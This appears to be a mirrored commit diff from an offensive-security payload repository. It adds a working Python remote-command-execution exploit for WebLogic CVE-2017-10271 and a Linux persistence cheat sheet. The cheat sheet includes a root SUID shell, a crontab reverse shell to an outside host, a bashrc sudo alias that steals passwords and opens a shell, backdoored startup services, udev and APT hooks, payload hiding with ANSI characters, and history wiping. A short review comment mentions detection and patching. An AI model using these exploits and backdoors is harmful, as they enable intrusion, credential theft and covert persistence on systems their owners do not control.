mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Linux Persistence + WebLogic RCE
parent
011baa7321
commit
beb0ce8c54
61
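--- a/CVE Exploits/WebLogic CVE-2017-10271.py
+++ b/CVE Exploits/WebLogic CVE-2017-10271.py
@@ -0,0 +1,61 @@
+import requests
+import sys
+
+url_in = sys.argv[1]
+payload_url = url_in + "/wls-wsat/CoordinatorPortType"
+payload_header = {'content-type': 'text/xml'}
+
+
+def payload_command (command_in):
+html_escape_table = {
+"&": "&",
+'"': """,
+"'": "'",
+">": ">",
+"<": "<",
+}
+command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
+payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
+" <soapenv:Header> " \
+" <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
+" <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
+" <void class=\"java.lang.ProcessBuilder\"> \n" \
+" <array class=\"java.lang.String\" length=\"3\">" \
+" <void index = \"0\"> " \
+" <string>cmd</string> " \
+" </void> " \
+" <void index = \"1\"> " \
+" <string>/c</string> " \
+" </void> " \
+" <void index = \"2\"> " \
++ command_filtered + \
+" </void> " \
+" </array>" \
+" <void method=\"start\"/>" \
+" </void>" \
+" </java>" \
+" </work:WorkContext>" \
+" </soapenv:Header>" \
+" <soapenv:Body/>" \
+"</soapenv:Envelope>"
+return payload_1
+
+def do_post(command_in):
+result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
+
+if result.status_code == 500:
+print "Command Executed \n"
+else:
+print "Something Went Wrong \n"
+
+
+
+print "***************************************************** \n" \
+"**************** Coded By 1337g ****************** \n" \
+"* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
+"***************************************************** \n"
+
+while 1:
+command_in = raw_input("Eneter your command here: ")
+if command_in == "exit" : exit(0)
+do_post(command_in)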
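Review bot: The result check in `do_post` prints `Command Executed` for any HTTP 500, but a 500 only shows that the endpoint raised an error while handling the SOAP request; it does not by itself confirm that the host is unpatched or that anything ran. Used as a verification script during an assessment, this will mislabel hosts, so I would reword the message to `print "HTTP 500 returned - execution not confirmed \n"` and say in a module docstring that the check is blind. The file also has no header comment, and one would help readers doing detection work: the request it sends is a POST to `/wls-wsat/CoordinatorPortType` whose `work:WorkContext` SOAP header carries a `java.beans.XMLDecoder` element, which is a straightforward signature for proxy or WAF logs. The same comment could note that the durable fix is the vendor patch for CVE-2017-10271, with restricting access to the `wls-wsat` endpoint as a stopgap.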
96
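--- a/Methodology and Resources/Linux - Persistence.md
+++ b/Methodology and Resources/Linux - Persistence.md
@@ -0,0 +1,96 @@
+# Linux - Persistence
+
+## Basic reverse shell
+
+```bash
+ncat --udp -lvp 4242
+ncat --sctp -lvp 4242
+ncat --tcp -lvp 4242
+```
+
+## Suid Binary
+
+```powershell
+TMPDIR2="/var/tmp"
+echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
+gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
+rm $TMPDIR2/croissant.c
+chown root:root $TMPDIR2/croissant
+chmod 4777 $TMPDIR2/croissant
+```
+
+## Crontab (Reverse shell to 192.168.1.2 on port 4242)
+
+```bash
+(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
+```
+
+## Backdooring an user's bash_rc (FR/EN Version)
+
+```bash
+TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
+cat << EOF > /tmp/$TMPNAME2
+alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
+EOF
+if [ -f ~/.bashrc ]; then
+cat /tmp/$TMPNAME2 >> ~/.bashrc
+fi
+if [ -f ~/.zshrc ]; then
+cat /tmp/$TMPNAME2 >> ~/.zshrc
+fi
+rm /tmp/$TMPNAME2
+```
+
+
+## Backdooring a startup service
+
+```bash
+RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
+sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
+```
+
+## Backdooring a driver
+
+```bash
+echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
+```
+
+## Backdooring the APT
+
+If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};`
+Next time "apt-get update" is done, your CMD will be executed!
+
+```bash
+echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
+```
+
+## Tips
+
+Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
+
+```bash
+#[2J[2J[2J[2H[2A# Do not remove. Generated from /etc/issue.conf by configure.
+```
+
+Clear the last line of the history.
+
+```bash
+history -d $(history | tail -2 | awk '{print $1}') 2> /dev/null
+```
+
+The following directories are temporary and usually writeable
+
+```bash
+/var/tmp/
+/tmp/
+/dev/shm/
+```
+
+
+## Thanks to
+
+* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
+* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
+* [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html)
+* [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/)
+* [Pouki from JDI](#no_source_code)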